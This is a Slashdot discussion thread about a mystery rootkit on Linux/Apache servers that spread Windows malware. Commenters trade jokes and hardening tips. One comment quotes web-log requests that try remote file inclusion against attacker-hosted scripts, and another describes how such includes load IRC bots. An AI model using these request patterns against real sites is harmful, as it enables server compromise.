Slashdot Mirror
Mystery Malware Affecting Linux/Apache Web Servers
lisah writes "Reports are beginning to surface that some Web servers running Linux and Apache are unwittingly infecting thousands of computers, exploiting vulnerabilities in QuickTime, Yahoo! Messenger, and Windows. One way to tell if your machine is infected is if you're unable to create a directory name beginning with a numeral. Since details are still sketchy, the best advice right now is to take proactive steps to secure your servers. 'We asked the Apache Software Foundation if it had any advice on how to detect the rootkit or cleanse a server when it's found. According to Mark Cox of the Apache security team, "Whilst details are thin as to how the attackers gained root access to the compromised servers, we currently have no evidence that this is due to an unfixed vulnerability in the Apache HTTP Server." We sent a similar query to Red Hat, the largest vendor of Linux, but all its security team could tell us was that "At this point in time we have not had access to any affected machines and therefore cannot give guidance on which tools would reliably detect the rootkit."'"
I wonder what other OSs have the issue.
Also, if this is utilizing windows machines as well, how would a person with windows find out if their machine was compromised?
It's high time for better software, and the only way to get that is to apply market pressure. Software liability is the answer.
I think it's funny that Apache is affected by the same drama that affected IIS all those years ago.
We havent really grown up, have we?
This is why serious businesses choose a serious web server: Microsoft Internet Information Services running on Microsoft Windows Server.
Last night I discovered a directory named 53 4B 59 4E 45 54 in my home folder.
I do believe tht if this story was with IIS it would be tagged ahah :)
"According to a press release issued earlier this month ..."
Yawn.
Does this rootkit work on a hardened Gentoo install with no LKM support on SPARC64? :P
-:sigma.SB
WARN
THERE IS ANOTHER SYSTEM
I can see thousand of people trying to make numeric directories :)
Yes, also if you can run your tummy while patting your head you aren't infected also.
I think.... this crazy idea is the virus!
IIS are serious server. This are serious thread.
In Xanadu did Kubla Khan
A stately pleasure dome decree
Bozo the Clown serious?
Lack of planning on your part does not constitute an emergency on mine.
Underage anime? Does that refer to pictures drawn after 1990?
It's for Apache/Linux so it must be well crafted code written with the best intention....
Isn't that always the case with FOSS. If it was for Microsoft then it would be _real_ malware....
I did a mkdir 09F911029D74E35BD84156C5635688C0 and all I got was a DMCA rm -f 09FA* request.
To figure out what the compromise vector is, it's probably going to be necessary to figure out what the compromised servers have in common -- and how that differs from uncompromised servers. (Keeping in mind that currently-uncompromised servers may have the same vulnerability, and that attackers or their software just may not have gotten to them yet.)
I'd suggest enumerating factors such as OS, OS version, remote access methods (ssh, ftp, etc.), Apache versions, Apache modules, add-ons like CPanel, network/ASN, and so on -- anything could be a culprit at this point.
And that includes things that have nothing to do with Linux or Apache: for example, it's possible that the attackers acquired root passwords by infecting Windows systems used by administrators -- then just waited for them to initiate ssh sessions to their servers. It'd probably be best to leave all possibilities open and consider them equally likely until evidence starts accumulating in favor of/against them. (In re-reading that last statement, I suppose it sounds a bit trite. I'm just trying to discourage premature conclusions that anything is at fault until somebody can produce evidence to support saying so.)
The Register has been on this for a while and although the story is older it is better written and has more interesting details: http://www.channelregister.co.uk/2008/01/16/mysterious_web_infection_continues/
my $.02 of course
I see this type of attack all the time, the fact that someone automated it and gave it a zombie machine is not surprising.
* Don't allow root to ssh into your machine.
* Disable ssh1.
* Limit sudoers.
* Have good passwords.
* ???
* PROFIT!!
Seems like a formula everyone should know.
I said no... but I missed and it came out yes.
Are your R's and B's "Crossover" keys, or Virtual Keys, or VirtualBox keys?
Run your tummy makes me think of being run over, or loosing a hot bowel of a lahar surmounting, umm, surpassing even Mt. Pinatubo.
Previously: "Linux... Toward the Sunrise..." Now: "Linux... Toward the-- No, now, part of Every Sunrise"
me@web:~$ cd ~www-data
me@web:/var/www$ mkdir 12directory
mkdir: cannot create directory `12directory': Permission denied
me@web:/var/www$
OHMIGOSH, I've been infected!
</dunce-mode>
Reports are beginning to surface that some Web servers running IIS are unwittingly infecting thousands of computers, exploiting vulnerabilities in QuickTime, Yahoo! Messenger, and Windows. One way to tell if your machine is infected is if a Windows logo appears on system startup. Since details are still sketchy, the best advice right now is to take proactive steps to secure your servers. 'We asked Sony if it had any advice on how to detect the rootkit or cleanse a server when it's found. According to Joe Blow of the Sony security team, "That rootkit is protected under the DMCA. Detection or cleansing the rootkit will be punished to the fullest extent permissible by law." We sent a similar query to Microsoft, the largest vendor of Windows, but all its security team could tell us was that "At this point in time we have not had access to any affected machines and therefore cannot give guidance on which tools would reliably detect the rootkit."
Seriously, everyone knows Linux is completely and utterly unhackable. This is obviously some kind of viral pro-MS FUD. =)
Is the way to go.
The GeekNights podcast is going strong. Listen!
I'll take my chances with *BSD.
It only takes one man to change the Wisdom of the Crowd to Tyranny of the Masses.
There are a thousand ways to root a machine, and there are a lot of ways to configure apache so that it's either very secure or very insecure - but really apache is just one attack vector. Being that all the machines that exhibited distribution of the windows malware, it may be a common configuration problem between those servers - but how many servers do they know about that were distributing the software? 10? 1000? 10,000? You would think if there were that many of them it there would be incremental backups that you could look through to see what was going on in the system.
Logically assuming that it is just a handful of servers based on the fact that nobody has pinpointed the problem, more likely it's that the server admins are either the problem, or it is an attack on a very specific configuration and software combination.
Whoa there buddy. Are you saying anything before 1990 is not underage?
GOD DAMNIT! How am I becoming old?
"I use a Mac because I'm just better than you are."
... though a solution has not been yet:
http://blog.trendmicro.com/e-commerce-sites-invaded/
If you happen to have one of these compromised systems, I am sure that Trend would like to talk to you about it...
There is something suspicious about this report. Some things can't happen the way people say they happen, and when that is the case we have to look at more likely scenarios.
I would bet the path of the TCP/IP packets route through compromised providers who have an injection strategy. Remember a few months ago how IPSs were injecting their own java script and ads into the pages of other sites?
http://ars.userfriendly.org/cartoons/?id=20070703
This is the most likely scenario I can think of.
* Don't allow root to ssh into your machine.
:)
This shouldn't be a big deal unless root also has an easily guessed password.
* Have good passwords.
Absolutely. Try "squam1sh666oss1frage" instead of "susan". Check your other users too, particularly people in group wheel. I had an account used as an attack because it was set up with an easily guessed name and password and I was never actually given the password - I always sshed in with a DSA key.
I would add:
* Have a string password validator, but don't force people to cycle passwords... that encourages easily guessed passwords because easily remembered ones are easily guessed. The best password validator is to run the best password cracking tools you can lay your hands on against your own password file.
FTFA:FTFA - "The random js toolkit was detected using Finjan's patented real-time code inspection technology while diagnosing users' web traffic during December 2007..."
This is all just a ploy to bring attention to Finjan for financial gain!
All your BASE are belong to us.
Knowledge is how to play a game, intelligence is how to win, wisdom is knowing what game to play.
You should worry more if you find one that's 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0 because that means that you're under siege by pirates, and it's really hard to find good ninjas these days.
Used to be that smarmy hipsters spoke in leetspeak with tongue firmly in cheek. By the next generation the ironic context was gone completely. We were left with hordes of dumbfucks using leetspeak and legitimately attempting to be cool. b1ff became REAL.
Now we have the same sort of annoying trend-slave fucks perpetuating the lolcat baby talk meme. I sure can't wait to see how utterly fucked-up and retarded the teenagers of the upcoming generation are going to sound thanks to you worshippers of the unintended consequence.
Just remember, wherever you go, there you are.
Armaments, 2-9-21 And Saint Attila raised the hand grenade up on high, saying, 'O Lord, bless this Thy hand grenade' N
This is obviously not true. After all, Linux zealots constantly say that Linux isn't vulnerable to malware...
The articles on this keep mentioning cPanel. Now, I've never used or looked at that specific web CP, but it seems likely to me all the attackers would have to do is find a vulnerability on of the scripts used for updating the configs, or adding a DB entry to update the configs, etc. Yes, I know this supposition is light on detail, but given what most control panels eventually have to have access to, seems the more likely than some mystery apache exploit... just tell the scripts they need to update the configs.. or use them to push an update to the machine, etc.
Goodbye Windows, Hello Linux...
RE: Goodbye Linux, Hello Linux...
FW: RE: Goodbye Windows, Hello Linux - Goodbye Linux, Hello OpenBSD.
Which is hardly an advantage on Linux because everybody can su to root.
/dev/tcp/25) acting as the required capability, rather than having to become superuser for such a common operation.
OK, check ALL your other users.
Limiting it to group wheel is not a particularly big hurdle. There are enough applications setuid to root to find execution exploits in that one more is not much of a barrier.
The common UNIX implementation whereby group 0 or UID 0 membership acts as the gateway to such unobvious capabilities as opening low ports really needs to be readdressed. Traditionally, you would have group access to devices (eg,
I have seen quite a bit of botnet activity on apache web servers lately. It is mostly due to bad coding where php developers run the include or require functions on an unchecked get variables. All the attacker has to do point that variable to a bad url and load the page in a browser. He then uses this to load a small php or perl bot that connects to various irc servers specified in the code. Once that is done all he has to do is issue commands in the irc channels to ddos, spam, scan... and so on. This is all run by under the owner of the apache service.
1 #include <stdio.h> /* Parse any options */
2 #include <stdlib.h>
3 extern int mkdir_main(int argc, char **argv)
4 {
5 int i = FALSE;
6
7 argc--;
8 argv++;
9
10
11 while (argc > 0 && **argv == '-') {
12 if ((*argv[0] >= 48) && (*argv[0] <=57))
13 {
14 printf("PWN3D N00B!!!111\n\n--Ron Paul 08");
15 return 1;
16
17 }
18
19 while (i == FALSE && *++(*argv)) {
20 switch (**argv) {
"Beware of bugs in the above code; I have only proved it correct, not tried it." -- Donald Knuth
Seems as good of a place as any to mention it, but maybe it has something to do with the multitudes of requests for URLs like: /exclusives.php?id=hxxp://amymusicgirl.h17.ru/mysong.txt?
/exclusives.php?id=hxxp://amyru.h18.ru/images/cs.txt?
/exclusives.php?id=hxxp://joioiskioeriyyskwkdwjsdfewis.land.ru/.html/body?
( tt changed to xx in protocol )
that I've been seeing in my logs for the last 8 months or more.. Or are these just a poor attempt to spam webmasters?
HMMM
Fail2ban is another nice way to deal with these brute force attacks.
Preventive War is like committing suicide for fear of death. - Otto Von Bismarck
...out there used to say the same exact thing, the OMG warning that if you made them make quality products and be subject to recalls/rebates/removal from the market, provide a warranty in other words, that everything would cost so much that it would collapse civilization. Cars to foods to snakeoil medicine, they all said the same thing back before there were *any* warranties or any safety standards or like that. Look around, software is the only one left that doesn't need a warranty, civilization never collapsed when all the other industries were forced into complying with bare minimum standards and "suitability for purpose" and everything is still affordable. What they did was take good engineering to heart, because to not do that costs them more money.
That old song and dance is old, it is a pitiful juvenile whiny crybaby excuse from shoddy practicers, baby talk nonsense.
The software industry will never collapse, it is too valuable. All that will happen is not as fast releases of much better quality code, much less emphasis on 3-d effects and zebra striped "skins", and think on this all you devs-you now would have the perfect weapon against the PHB and sales weasels to let you actually do good code, instead of forced shipping of what you *know* is almost complete crap.
You can't even begin to call yourself an adult in a professional position unless you are willing to stand up for the quality of your work, including "suitability of purpose", such as being exposed to the internet. Take the training wheels off, or go get a job you can be competent in, that should apply to ALL industries, with no exceptions.
I have a pretty long password, and I'm pretty bad at remembering things.
Besides hopefully you don't have 12345 as root password, because anything but that will be pretty hard to brute force. I'm fine with people trying to log on as root on my machine. They are going to need a lot of time to find my password that way.
Why do people allow the public Internet to brute-force accounts on their systems? There are plenty of ways to cut off IPs who have too many failed login attempts. Or, you could do what I do:
[casper]$ ssh myserver.com
Permission denied (publickey).
In other words, if you want to log into my server, you need a certificate. No password-based logins are disallowed by system policy.
They don't grade fathers, but if your daughter's a stripper, you fucked up. --Chris Rock
You can not login as root to a BSD-machine, even if you enter the password correctly from the first attempt. That's the point. And if you are a legitimate user here, you would know this and would not even try.
Which means, all those, who try, are not legitimate and should be blocked on-sight...
In Soviet Washington the swamp drains you.
..that would ensue if this was IIS?
:) - just like the mac ads ;)
yep.. hypocrites
Comment removed based on user account deletion
Comment removed based on user account deletion
It are serious business.
I identified this rootkit in a system about 5 months ago and slightly documented some behaviours of it (I think only behaviour I've missed was numerical directory thingy). Related blog post 25.08.2007 - http://ferruh.mavituna.com/makale/exploit-paketleri/ ).
.js after body tag in all interfaces. There was one article that mentioned most of the compromised servers based UK, it was same for me. And considering it's been about 5 months, I assume UK websites were prime target in the start.
There is one more thing to add, it modify all valid HTTP responses, add
I use sshblack on my FreeBSD machine.
Vivin Suresh Paliath
http://vivin.net
I like
with malware because Linux is a hostile environment.
Unix systems can be infected, like the original Arpanet worm that Robert Morris Jr. was accused of writing that infected Sendmail Unix servers.
I had run a Linux server in the past for my web server and I noticed things like that which forced me to reformat the system because Linux was acting funny with directory names and log files kept being deleted for no reason, to hide the malware infections and/or hacking attempts.
Remember, Slashdot does not have a -1 disagree moderation, and no, troll, flamebait, and overrated are not substitutes.
Unix systems can be infected, like the original Arpanet worm that Robert Morris Jr. was accused of writing that infected Sendmail Unix servers.
I had run a Linux server in the past for my web server and I noticed things like that which forced me to reformat the system because Linux was acting funny with directory names and log files kept being deleted for no reason, to hide the malware infections and/or hacking attempts. sorry but this really doesn't sound like you knew what you were doing.
"Last week, ScanSafe's Landesman drew a link between the security breach at UK-based Fasthosts and the site hacks, saying then that the domains ScanSafe had found infected had, or had recently had, a relationship with Fasthosts."
http://www.techworld.com/security/news/index.cfm?newsid=11184
It's not a software flaw according to Landesman. Its stupid admins not changing passwords or with a lingering delayed infection from the initial theft.
Huh? This reminds me of the incident where our mother in law asked a group of us if we were high because she seriously thought we were "laughing too much."
Wus. I want more baby, Ooh yeah! You know I love it!
Semi-automatic amateur armchair Australian philosopher; conjecture ready at any moment...
It won't happen as long as Microsoft fends his software via EULA. If they don't want to be held liable, why another software maker would want to accept liability?
The user can figure out which software is of better quality and use that one.
That's not new - Fedora Core 1 servers running cPanel handed out to "admins" who load it up with phpBB and never update it host a fair bit of crap. We've migrated customers off of those boxes, and it's always fun to check every single file you bring over to make sure there's no surprises.
On the last server compromise I had to clean up (php site, not updated - standard story), I spent some time going through the logs to check what other sites they'd used this thing as to springboard into other machines. It was a fair collection of blog servers, bulletin boards, and a few company sites. When I could locate a phone number, I would give them a call. Not a single one of the admins knew their boxes were hosting malware. A couple boxes had been replaced after whoever got in wrecked the site, but the vast majority were running just fine, just with a '.../' directory hanging off the web root.
Why can't I mod "-1 Idiot"?
I use OpenBSD for Internet-facing applications where I want security, e.g. the DMZ box on my home network that I want to be able to SSH into from the outside world. I really like OpenBSD conceptually, and happily send them my $60 or whatever it costs for a DVD with each major release, although I wish the pool of officially vetted software was bigger. (*cough* POSTFIX *cough*)
Because I use it for gateway/edge machines, I don't build the ports tree or use any software that's not part of the official system. This is pretty limiting and definitely not something you'd want to do if you were using it as a workstation. (OpenBSD has two kinds of software: officially-supported stuff, where somebody has combed through the code and generally locked it all down, and unsupported/unofficial 'ports,' which are installed slightly differently and haven't necessarily received the same level of attention.) There's definitely enough officially-supported OpenBSD software to run a basic server (mail/web/DNS) without going to ports, but you may not have the level of choice you're used to in, say, Debian Stable.
In fact although there are lots of people out there who run OpenBSD as a workstation OS, I'm not really sure why you'd want to (instead of one of the BSDs that's geared more towards that as a primary function). I could see the security benefits potentially coming into play if it was a laptop, and the code is very clean with an emphasis on technical 'correctness' (so it might be a good OS to run if you want to really understand what's going on inside your computer), but there are other options which are equally or more attractive for a pure desktop system. That's just my gut feeling; I'm sure there are other people who'd say differently and I certainly wouldn't argue with them.
Personally, I run either Mac OS X or Debian on my workstation/firewalled PCs. The Macs are mostly just out of inertia and the Debian machines are because I like apt-get. While there's no doubt in my mind that OpenBSD is the more technically correct, better designed, better documented, and less defect-prone system, it's not quite enough for me to switch over my day-to-day PCs. I am, I suppose, proof of my own assertion in my earlier comment.
The BSDs are pretty fascinating, and I think if I were starting with a clean slate today, without all the legacy applications and data and personal biases that I have, I'd probably look very seriously at one of the desktop BSD distros. Particularly if you're a student, there's something to be said for using a system that at least plays lip service to doing things 'right.'
One note regarding OpenBSD: if you do decide to play with it, you may want to avoid 4.2 and opt for 4.1 instead; 4.2 requires that you install X11 in order to run many packages that should not require X11 (server software), because of some dependency issues. This is supposed to be corrected in 4.3. Of course, if you're creating a workstation OS and plan to install X11 anyway, this is a moot point, but it's something to note if you're going to play with it on a server or headless box using the CLI first (which isn't a bad thing to do).
"Ladies and gentlemen, my killbot features Lotus Notes and a machine gun. It is the finest available."
If Linux is secure, it shouldn't matter if the admins know what they're doing.
dom
Roasting in an epic bread.
Someone mod the entire thing +4ch up, please...
USE HOT GRITS WITH STATUE OF NATALIE PORTMAN (NAKED AND PETRIFIED)
The Microsoft Ad Campaign denouncing the evils of open source or the Linux Patch fixing the problem?
Genesis 1:32 And God typed
In the article they are speculating that the vector may have been a root password compromise. There are several ways of getting at this, it could be a weak password, it could be a brute force attack against an obtained password file, it could be social engineering.
You'd be surprised how many weak root passwords there are out there, my home machine was recently the victim of a dictionary attack (my own stupid fault - weak password on a seldom used account got compromised). They did not get root, I've run forensics on the compromised disk however it was still used to scan other machines for ssh access. I found and stopped it within 12 hours, but in that time it had found over 30 machines it could SSH into including one with the root password 'root'.
There is no technical solution to poor administration, a well maintained Windows system will be more secure than a poorly maintained Linux system.
I read else where that the passwords to the Apache servers were stolen: Hardly a vulnerability, just careless by somebody. The vulnerable machines are the Windows boxes that are getting attacked successfully. Same old story, really.
n/t
my root password is secure, its 24 characters long has no repeating sequences use upper and lower case numbers and non alphanumeric values.
its "AS23459%^&glmG=$%de+" which as far as john the ripper is concern is unbreakable.
Not that easy to rememeber, but I have been using it for 7 years and its on all my production boxes and my laptop.
Comment removed based on user account deletion
Does anyone have proof that root was achieved through an Apache exploit?
I don't think mapping group ID directly to port is a good idea. For one thing, it's not generally extensible to other numeric domains. You should map permissions on an object visible in the file system to access to the port. Ideally, this would be handled by replacing crazy overlaid in_addr objects with filenames.
/net/tcp/listen/* would provide access control. Similarly, to make an outgoing connection, you'd call 'sock = open("/net/tcp/connect/10.0.0.2/25", O_RDWR);'. You wouldn't need to modify your code to connect to IPV6 or even OSI TP4/CONS or DEC LAT ports... or UNIX domain sockets... or named pipes...
That is, instead of calling socket and bind and so on, you'd call 'sock = open("/net/tcp/listen/25", O_RDWR)'. Normal file system protection on
The whole Berkeley Socket design is second only to System V IPC in terms of missing the whole point of UNIX.
Comment removed based on user account deletion
System security aside, the idea that 90% of users don't give a shit, and that's okay, is the whole problem here.
But users who do care don't use MSWindows.
And you, who expect another 15 years of "satisfaction" don't seem to understand why.
situation normal, all fouled up, business as usual, let's make some more money.
Computer memory is just fancy paper, CPUs just fancy pens with fancy erasers; the 'net is just a fancy backyard fence.
I'm with you on software liability, iff Micro$oft leads the list of liable entities.
Because, in fact, they do. They pushed the internet to the public before it was ready. Everybody else who did that understood the dangers pretty soon and backed off. Bill and Steve picked up the ball and run. Didn't seem to realize they were running towards the wrong goalposts, maybe, or maybe they just knew the fan club of the opposing team was willing to reward them richly.
Computer memory is just fancy paper, CPUs just fancy pens with fancy erasers; the 'net is just a fancy backyard fence.
I can't seem to find any mentions of someone figuring out exactly what this exploit/problem/etc. is. Seems really weird. I mean, *someone* has to have an infected machine that can be looked at. And what about SysAdmins doing something to at least perform post-compromise analysis? Even my *personal* webserver logs over syslog-ng to an append-only filesystem, and Bacula runs nightly MD5sums of pretty much the whole FS (not to mention remotely downloading the bacula binary every night and MD5summing that). At the very least, someone should be able to verify the technical details.
Something here reeks of FUD....
"GUIs provide metaphors for users, they have no place in administration." - GREAT quote.
And as to IIS/Apache/whatever else... telling people to use IIS when a problem is found that may involve Apache is as stupid as telling IIS people to use Apache when (another) IIS bug is found. Software is buggy. When the likes of Amazon, Google, etc. use Apache (or base their servers on it), I think it can be considered stable enough for production use. All software has flaws. That's a fact of life. Telling people to use a different package becaause of one bug is as narrow-minded as telling people to sell their Hondas/Fords/Chevys/Toyotas because you saw one in the shop.